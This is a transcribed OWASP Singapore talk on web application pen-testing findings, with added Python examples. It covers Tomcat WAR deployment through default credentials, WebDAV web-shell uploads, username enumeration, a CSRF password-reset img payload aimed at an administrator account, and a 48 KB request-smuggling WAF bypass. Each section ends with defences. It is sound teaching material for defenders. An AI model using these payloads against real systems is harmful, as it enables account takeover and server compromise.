A Rojak of Singapore Web Exploits
Ryan Baxendale – OWASP Singapore
14th November 2012
Who Am I?
I am Ryan
I live in Singapore
Security Consultant at Security-Assessment.com
I find bugs in web applications and hack things
Agenda
Today's rojak includes bugs in
1. Microsoft SharePoint (Top10-A6-Security Misconfiguration)
2. Administrative Interfaces (Top10-A6-Security Misconfiguration)
3. JavaScript Encryption (Top10-A3-Broken Authentication)
4. “Too” Factor Authentication (Top10-A3-Broken Authentication)
5. Password Reset (XSRF + Horrible password reset)
6. 2 Requests Are Better Than 1 (WAF Bypass)
Microsoft SharePoint
Intranet content management
and document management
SharePoint can be used to
provide:
intranet portals, document & file
management, collaboration, social
networks, extranets, websites,
enterprise search, and business
intelligence
'Publishing' feature can be used
to manage larger public websites
You might not know that site xyz is
running on SharePoint
Microsoft SharePoint
Find additional functionality through the SharePoint site
Try all the default or well-known SharePoint pages:
/AllItems.aspx
/Common.aspx
/MyPage.aspx
/recyclebin.aspx
…
Nice list from
Stach&Liu – SharePoint Hacking Diggity Project
Also try to look for the admin web interface on a high port,
although probably not available over internet due to firewall
Microsoft SharePoint
Example: isaca.org/_layouts/mobile/mbllists.aspx (screenshot of the mobile list view; callout: Username)
Microsoft SharePoint
Upload your own page, edit pages
Screenshot callouts:
The user that created and modified this item
Links to internal team sites and other confidential things
Create a new page, edit a page
Microsoft SharePoint
Find the list of user accounts, guess passwords, get access
Screenshot callouts:
All the site content, pages, things that should not be seen by the public, etc.
"I want to hack this account"
This is the list of users from Active Directory
Microsoft SharePoint
Don’t have internal or confidential information on external-facing SharePoint sites
Firewall the admin port
ACL to block external IP addresses from accessing SharePoint pages
Administrative Interfaces
Manage web applications and content
on web servers
Admin interfaces let you run your own web
shell
OWASP states the following objectives:
Administrator level functions are
appropriately segregated from user activity
Users cannot access or utilize administrator
functionality
(boring..) Provide necessary audit and
traceability of administrative functionality
Administrative Interfaces
Screenshot callouts (Tomcat manager page):
Links to admin interfaces
Documentation, if you need help haxx0ring
Upload metasploit payload
Usually on port 8080 (Apache Tomcat)
Try default usernames and passwords (tomcat:tomcat, admin:tomcat, both:tomcat, manager:tomcat, etc.)
Administrative Interfaces
Create a metasploit payload
WAR file and upload
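Added example, not the talk's tooling (the talk used a Metasploit-generated WAR): what the manager upload actually consists of. The WAR is a zip with WEB-INF/web.xml plus a JSP, and the manager accepts it as the body of an HTTP PUT. The JSP here only prints the account Tomcat runs as (proof of execution, not a shell), and the host, context path and credentials are placeholders; the /manager/text/deploy path is the Tomcat 7+ text interface (Tomcat 5.5/6 use /manager/deploy with the same parameters).

```python
"""Build a minimal WAR and the raw manager PUT that deploys it (added example)."""
import base64
import io
import zipfile

# Proof-of-execution JSP, constructed for this example: reports who Tomcat runs as.
INDEX_JSP = """<%@ page import="java.net.InetAddress" %>
user=<%= System.getProperty("user.name") %>
host=<%= InetAddress.getLocalHost().getHostName() %>
os=<%= System.getProperty("os.name") %>
"""

# Minimal deployment descriptor; index.jsp is served for the context root.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(jsp_name="index.jsp", jsp_body=INDEX_JSP) -> bytes:
    """A WAR is just a zip: WEB-INF/web.xml plus the pages to serve."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_body)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """List the archive members (used to check what we built)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def manager_deploy_request(host, context, war_bytes, username, password) -> bytes:
    """Raw HTTP PUT for the Tomcat text manager: the WAR is the request body and
    the context path is a query parameter. Credentials go in HTTP Basic auth,
    which is where the default tomcat:tomcat style passwords get tried."""
    auth = base64.b64encode(f"{username}:{password}".encode()).decode()
    head = (
        f"PUT /manager/text/deploy?path={context} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: Basic {auth}\r\n"
        "Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(war_bytes)}\r\n\r\n"
    )
    return head.encode() + war_bytes


if __name__ == "__main__":
    war = build_war()
    print(war_entries(war))
    req = manager_deploy_request("target.test:8080", "/owasp", war, "tomcat", "tomcat")
    print(req.split(b"\r\n\r\n", 1)[0].decode())
```

Once deployed, the page is reachable at http://host:8080/<context>/ and the manager's own list page (/manager/text/list) shows the new context, which is also where a defender spots it: an unexpected context in the manager list, or a PUT to /manager in the access log, is the indicator to alert on.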
Administrative Interfaces
HTTP Methods (WebDAV)
PUT – Put a file on the server, a web shell perhaps?
DELETE – Delete a file
INDEX – List the files
PROPFIND – Find files, discover backup files
IIS 6.0
WebDAV by default only supports static Web pages, not dynamic
pages (ASP)
Administrative Interfaces
Generate metasploit payload
Fix the payload
Upload with Cadaver
Run the payload
Administrative Interfaces
Guess usernames and
passwords with hydra/medusa
then “PUT” a web shell
Password-protected WebDAV methods
Nobody knew that the server had this functionality
So nobody changed the password
Administrative Interfaces
Find WebDAV enabled servers with metasploit
Administrative Interfaces
Don’t let users connect to admin interfaces
Firewall rules
https://www.owasp.org/index.php/Administrative_Interface
JavaScript Encryption
JavaScript runs on the client side (browser)
<script> ... JavaScript ... </script>
JavaScript debuggers:
Firebug (Firefox)
Chrome developer tools
Internet Explorer developer tools (F12)
View source
JavaScript Encryption
Client: “We don’t use SSL/TLS because we have
encrypted passwords”
Implemented in JavaScript
Takes each character of the username/password, e.g. ‘a’, and
changes it to a number, e.g. ‘23’
Separates characters with ‘0’
‘admin’ gets sent as ‘2305060340560’: ‘a’ = 23, ‘d’ = 5, ‘m’ = 6, ‘i’ = 34, ‘n’ = 56
“admin”… Seems like the password starts with “admin” too..
JavaScript Encryption
I broke your JavaScript encryption with a l33t BlackHat
HaXx0r tool called...
Microsoft Excel
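Added example, not code from the talk or from the application it describes: the "Excel" attack in Python. The five codes on the slide (a=23, d=5, m=6, i=34, n=56, separated by '0') are real; every other entry in the assumed table is made up for the demo, and the model assumes, as the observed codes do, that no code contains a '0', which is what makes the separator unambiguous. recover_table is the whole attack: push each character through the page's own routine once and record what comes out.

```python
"""Recovering a client-side substitution 'encryption' table (added example)."""
import string

# Codes taken from the slide; everything else in the table is assumed.
KNOWN = {"a": "23", "d": "5", "m": "6", "i": "34", "n": "56"}


def assumed_table() -> dict:
    """Fill out the rest of the alphabet with invented, '0'-free codes so the
    model encryptor can be run on arbitrary input. This is a stand-in for the
    real page's table, which we never see directly."""
    table = dict(KNOWN)
    used = set(table.values())
    n = 1
    for c in string.ascii_lowercase + string.digits:
        if c in table:
            continue
        while str(n) in used or "0" in str(n):
            n += 1
        table[c] = str(n)
        used.add(str(n))
        n += 1
    return table


ASSUMED_TABLE = assumed_table()


def js_encrypt(text: str, table: dict) -> str:
    """Model of the client-side routine: substitute each character, then '0'."""
    return "".join(table[c] + "0" for c in text)


def decode(captured: str, table: dict) -> str:
    """Invert the substitution on a value sniffed from the wire. Splitting on
    the separator works because codes never contain '0'."""
    inverse = {v: k for k, v in table.items()}
    codes = [c for c in captured.split("0") if c]
    return "".join(inverse.get(c, "?") for c in codes)


def recover_table(oracle, alphabet: str) -> dict:
    """The spreadsheet trick: feed one character at a time through the page's
    own function (here the model; in practice the browser console) and read
    the code back. No key needed, because there is no key."""
    return {c: oracle(c).rstrip("0") for c in alphabet}


if __name__ == "__main__":
    wire = js_encrypt("admin", ASSUMED_TABLE)
    print(wire)                      # 2305060340560, as on the slide
    recovered = recover_table(lambda s: js_encrypt(s, ASSUMED_TABLE),
                              string.ascii_lowercase + string.digits)
    print(decode(wire, recovered))   # admin
```

The point the code makes is that decode needs nothing the attacker does not already have: the table is in the script, and even without reading the script it can be rebuilt with one request per character.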
JavaScript Encryption
JavaScript with public/private key encryption
Server: “Hey ;) Here’s my public key”
Client has: User: AsianGirl2012, Password: ChickenRice1
Encrypt(Public Key, Credentials) -> User: J#^ZML@)*FMA&, Password: acE($2mvT$^m!fG
Anyone watching the wire sees only the ciphertext: “??? Where is the chicken rice?”
Server: Decrypt(Private Key, Credentials) -> User: AsianGirl2012, Password: ChickenRice1
JavaScript Encryption
A substitution cipher is not encryption
JavaScript makes secret keys visible to the user
Use public/private key encryption in JavaScript: the private key stays on the server, so nothing in the page lets a reader recover the credentials
Still use TLS: over plain HTTP an attacker who can read the traffic can usually also rewrite the script, and swap in a public key of their own
“Too” Factor Authentication
Two-factor authentication requires the use of two of the three
authentication factors:
Something the user knows (password, PIN);
Something the user has (ATM card, smart card); and
Something the user is (biometric characteristic, such as a fingerprint)
Most of the time it ends up being knows (password) and has
(token)
“Too” factor authentication is...
“Too” Factor Authentication
First login/signup for “Too” factor
authentication Login with “Too” factor
authentication
“Too” Factor Authentication
Screenshot callout: verbose error message and step-by-step authentication
“Too” Factor Authentication
Aban
Abbas
Abbud
Abbudin
Abdul
Abdel
Abdal
Abdul
Adl
Abdul-Ahad
Abdul-Alim
Abdul-Aliyy
Abdul-Azim
Abdul-Aziz
Find a list of common names for the typical customers
Burp Intruder: send every name as the username and look at the response
Now we know all the usernames
Continue by doing the same thing on the next step of this broken authentication
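Added example, not the application's code: the username-enumeration step as a model. verbose_login behaves like the "Too" factor app (a different message for an unknown username than for a wrong password), hardened_login returns one message and does the same amount of work either way, and enumerate_users is Burp Intruder reduced to its logic: try every name with a junk password and keep the ones whose response differs from the baseline. The user store, password hashing stand-in and messages are all constructed for this example.

```python
"""Username enumeration through verbose login errors, and the fix (added example)."""
import hashlib
import hmac
import secrets


def _h(pw: str) -> str:
    # Stand-in for a real password hash (use bcrypt/scrypt/argon2 in practice).
    return hashlib.sha256(pw.encode()).hexdigest()


# Constructed user store: two real accounts, everyone else unknown.
USERS = {"abdul": _h("ChickenRice1"), "abbas": _h("Laksa99")}
# Hash compared against when the user does not exist, so timing is the same.
DUMMY = _h("not-a-real-password")

# First names from the slide's wordlist, lowercased (constructed candidate list).
NAMES = ["aban", "abbas", "abbud", "abbudin", "abdul", "abdel", "abdal"]


def verbose_login(username: str, password: str) -> str:
    """The broken version: the message tells you which check failed."""
    if username not in USERS:
        return "Unknown username"
    if not hmac.compare_digest(USERS[username], _h(password)):
        return "Incorrect password"
    return "OK"


def hardened_login(username: str, password: str) -> str:
    """One message for both failures, and the hash comparison always runs so
    response time does not leak what the message no longer does."""
    stored = USERS.get(username, DUMMY)
    ok = hmac.compare_digest(stored, _h(password)) and username in USERS
    return "OK" if ok else "Invalid username or password"


def enumerate_users(candidates, login) -> list:
    """Intruder in three lines: establish the 'no such user' baseline with a
    name that cannot exist, then keep every candidate that answers differently."""
    baseline = login("zz-no-such-user-" + secrets.token_hex(4), "x")
    return sorted(n for n in candidates if login(n, "x") != baseline)


if __name__ == "__main__":
    print(enumerate_users(NAMES, verbose_login))   # ['abbas', 'abdul']
    print(enumerate_users(NAMES, hardened_login))  # []
```

When testing a real target the "response" to compare is more than the message: length, status code and timing all need to be identical between the two failure cases, which is why Intruder's sort-by-length and sort-by-time columns are usually where the enumeration shows up first.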
“Too” Factor Authentication
But wait there’s more…
“Too” Factor Authentication
Some things are just not the same
2FA is a combination of two: know, have, is
Password Reset
Password reset
Typically an admin function to change a user’s password to a randomly
generated password and securely transmit the new password to the
user
A typical reset password page for a user
Asks for email/username, maybe a secret question
Sends unique password reset link to email address
A typical change password page
Asks for old password, new password, confirm your new password
Password Reset
Once upon a time a lazy developer needed to create a reset
password page
“Lets just take the change password page and make a few changes”
Great idea!......for pen testers
If a typical change password page takes username (from
session), old password, new password and confirmed new
password as input...
Creating a password reset page would only need the following input:
username and new password
Password Reset
Password reset page accepted the following:
Hidden input useraccount set to administrator (because we are the admin, right?)
Hidden input oldPassword set to administrator
Password and confirmpasswd set to the new password
userID set to the victim’s username
Let’s get access to the admin account with Cross-Site Request Forgery (XSRF/CSRF)
Create an image tag with a request to change the password:
<img src="https://website/LoginServlet?action=resetpassword&useraccount=administrator&oldPassword=administrator&Password=password4444&confirmpasswd=password4444&userID=administrator&CALLER=" />
Password Reset
To get it working:
Admin needs to view a page with the CSRF img tag
Must be logged into the application in the same web
browser
Possible ways to share your img tag
Web forum
Profile signature
Create a note with HTML editor (tinymce)
Send a personal message
You get to login as Administrator with password4444
Password Reset
Don’t be a lazy developer
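Added example, not the application's code: what the non-lazy version looks like. The three things that made the img tag work were that the reset handler took the target account from the request (userID), that it changed state on a GET, and that nothing tied the request to the user who submitted it. Below, the account is identified only by a one-time, expiring token that was mailed to it, only the token's hash is stored, and the form that completes the reset carries a per-session CSRF token. Function names, the in-memory stores and the hashing stand-ins are assumptions for the demo.

```python
"""Token-based password reset that is not a renamed change-password page (added example)."""
import hashlib
import hmac
import secrets
import time

RESET_TTL = 15 * 60          # seconds a reset link stays valid
MIN_PASSWORD_LEN = 12

_tokens = {}                 # sha256(token) -> (username, expires_at)
_passwords = {}              # username -> password hash (stand-in store)


def _hash_token(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def request_reset(username: str, now: float = None) -> str:
    """Step 1 (the 'forgot password' form): mint a random token, remember only
    its hash, and mail the token to the account's address. Returns the token
    here because the mail step is outside the example. Note the caller never
    gets to choose which account the token belongs to later on."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _tokens[_hash_token(token)] = (username, now + RESET_TTL)
    return token


def complete_reset(token: str, new_password: str, confirm: str, now: float = None) -> bool:
    """Step 2 (the link from the mail): the token alone names the account, so
    there is no userID/useraccount parameter for a forged request to set.
    Tokens are single use and expire."""
    now = time.time() if now is None else now
    if new_password != confirm or len(new_password) < MIN_PASSWORD_LEN:
        return False
    entry = _tokens.pop(_hash_token(token), None)   # pop: a token works once
    if entry is None:
        return False
    username, expires_at = entry
    if now > expires_at:
        return False
    # Stand-in for a real KDF (bcrypt/scrypt/argon2).
    _passwords[username] = hashlib.sha256(new_password.encode()).hexdigest()
    return True


def csrf_ok(session_token: str, submitted: str) -> bool:
    """For the authenticated change-password form: the POST must carry the
    per-session token, compared in constant time. An <img> tag cannot supply it."""
    return bool(session_token) and hmac.compare_digest(session_token, submitted or "")


if __name__ == "__main__":
    t = request_reset("alice")
    print(complete_reset(t, "correct horse battery", "correct horse battery"))  # True
    print(complete_reset(t, "correct horse battery", "correct horse battery"))  # False, already used
```

Both handlers should also be POST-only: browsers will happily fetch an image from a GET URL with the victim's cookies attached, which is exactly what the slide's tag relies on.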
2 Requests Are Better Than 1
One day I was testing a web application
It gets tested often
And by lots of different people/companies
So at this point it’s one of the most boring (secure)
applications a pen tester can come across
2 Requests Are Better Than 1
I found a directory traversal bug where I request
/app/test../../../ and get a directory listing
This wasn’t too interesting because I could only see the
directory listing, but never access those files or folders
Something strange was going on...
2 Requests Are Better Than 1
Then using Burp Intruder with a list of common files and
folders (such as the DirBuster wordlist)
Found /app/test../../../console
2 Requests Are Better Than 1
This bug was only in the UAT environment
I need to get this bug working in production
There's a web application firewall (WAF) that looks at all the
requests and decides if they should be forwarded on to the
web server
But the client has a WAF, so they’re safe, right?...
So how do we trick the WAF into forwarding anything?
2 Requests Are Better Than 1
There’s a strange bug in a few web servers
“… Reports indicate that Microsoft IIS 5.0 truncates requests that contain
a body of greater than 48 KB in length. After 49152 bytes of a request
body are handled, IIS terminates the request and starts to parse a new
request.” (1)
“… There appears to be a bug … strangely, IIS/5.0 silently truncates the
body after 48K (49,152 bytes) … we can smuggle a request in the last
x bytes of the body.” (2)
“If the size of the request exceeds a particular threshold (by default, 48
KB), then the ISAPI or CGI code to which the request is directed needs to
be aware of chunked-transfer encoding to process the request correctly.”
(3)
(1) - www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21219
(2) - www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
(3) - hostingadministration.blogspot.sg/2008/01/urlscan-security-tool-faq.html
2 Requests Are Better Than 1
A basic HTTP POST request before smuggling:
POST /crosstraining/aboutyou2.php HTTP/1.1
Host: www.webscantest.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.webscantest.com/crosstraining/aboutyou2.php
Cookie: SESSIONID_VULN_SITE=4vdvho53o3vk9tjr94lks786q3
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
returnto=aboutyou2.php&fname=Ryan&nick=Security-Assessment&lname=OWASP&submit=submit
2 Requests Are Better Than 1
The idea is to send one big evil request, and a normal request
directly after it
The big evil request has to be more than 48 KB
We have to include what we need to send (parameters etc.)
Then fill the rest of the space with garbage
POST /test../../../console/adminlogin.jsp HTTP/1.1
Host: ….
Content-length: 49152
username=admin&password=admin&ThisIs48kbOfGarbage
ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage
ThisIs48kbOfGarbage……
GET /happy.nice.users.normal.page.jsp HTTP/1.1
Host:…
2 Requests Are Better Than 1
48 KB in bytes is 49152
The first request must be larger than 48 KB, and the Content-Length must be larger than 48 KB
In Burp, uncheck “Update Content-Length”: we want to manually specify that it’s a bit more than 48 KB
Screenshot callouts:
This is our malicious request
Now we fill the request with 48 KB of garbage -----------------------(snip)------------------------
This is our “normal” request that returns 404, but allows us to get our “evil” request to the web server
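Added example, not the talk's tooling: the two-in-one request from the slide built programmatically, plus a parser that can be run in either of the two modes the quoted references describe. With body_limit=None the parser honours Content-Length and sees a single POST whose body happens to contain a GET; with body_limit=49152 it behaves like the IIS 5.0 bug, drops the body after 48 KB and parses what follows as a second request. The device that does the inspecting and the device that does the serving disagree about how many requests there are, which is the whole trick. The paths and parameters are the slide's; the hostname is a placeholder, and the builder sets Content-Length to cover the padding and the trailing request, which is the "a bit more than 48 KB" the Burp callouts refer to.

```python
"""HTTP request smuggling via the 48 KB body truncation bug (added example)."""
TRUNCATE_AT = 49152   # 48 KB: bytes of body after which IIS 5.0 starts a new request


def build_smuggled(host: str, evil_path: str, params: str, normal_path: str) -> bytes:
    """One TCP payload: a POST with our parameters, padded so that exactly
    48 KB of body precedes a complete second request."""
    body = params.encode()
    assert len(body) < TRUNCATE_AT, "parameters must fit inside the first 48 KB"
    body += b"A" * (TRUNCATE_AT - len(body))   # garbage; no CRLFCRLF in here
    body += f"GET {normal_path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()
    head = (
        f"POST {evil_path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"    # covers padding AND the second request
    )
    return head.encode() + body


def _split_head(data: bytes):
    """Split one message into (request line, headers dict, remaining bytes)."""
    head, _, rest = data.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].decode(), headers, rest


def declared_content_length(data: bytes) -> int:
    _, headers, _ = _split_head(data)
    return int(headers.get(b"content-length", b"0").decode())


def parse_requests(data: bytes, body_limit: int = None) -> list:
    """Return the request lines a parser sees in this byte stream.
    body_limit=None: honour Content-Length fully (a WAF, or a correct server).
    body_limit=N:    consume at most N body bytes, then treat whatever follows
                     as the start of a new request (the IIS 5.0 behaviour)."""
    seen = []
    while data:
        request_line, headers, rest = _split_head(data)
        length = int(headers.get(b"content-length", b"0").decode())
        if body_limit is not None:
            length = min(length, body_limit)
        seen.append(request_line)
        data = rest[length:]
    return seen


if __name__ == "__main__":
    req = build_smuggled("target.test", "/test../../../console/adminlogin.jsp",
                         "username=admin&password=admin",
                         "/happy.nice.users.normal.page.jsp")
    print("Content-Length:", declared_content_length(req))
    print("Content-Length parser sees:", parse_requests(req))
    print("Truncating parser sees:   ", parse_requests(req, TRUNCATE_AT))
```

The same disagreement is what every request-smuggling variant exploits (Content-Length versus Transfer-Encoding is the better-known pair), and the defence is the same as well: the front end and the back end must parse the request identically, or the front end must normalise what it forwards and close the connection on anything ambiguous.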
2 Requests Are Better Than 1
Response from the server
As if we sent a normal request
Probably using IIS 5 or 6 with custom ISAPI filters or an
appliance such as CheckPoint FW-1 with “Web Intelligence”
Now lets login
2 Requests Are Better Than 1
Screenshot callouts:
Username and password to login
Login error: wrong user and password
Burp Intruder to the rescue! Brute force the password for admin
2 Requests Are Better Than 1
Winning!
Let’s deploy our own web app and get shell :D
2 Requests Are Better Than 1
WAF
Don’t rely on a web app firewall (WAF) to fix web app vulnerabilities
Fix the code
Recap
Microsoft SharePoint
Keep internal and external sites separate
Administrative Interfaces
Don’t let users connect to them, change default passwords
JavaScript Encryption
Don’t use your own encryption, use public/private key crypto
“Too” Factor Authentication
Remove verbosity from error messages, find out what 2FA is
Password Reset
Don’t be a lazy developer
2 Requests Are Better Than 1
A web app firewall (WAF) doesn’t fix broken code, fix the code
Questions? Comments
Contact:
Invite more people to OWASP meetings
Sign up and be active on the OWASP Singapore mailing
list
https://lists.owasp.org/mailman/listinfo/owasp-singapore
Hacker? Think you can hack? Got talent?
We are hiring!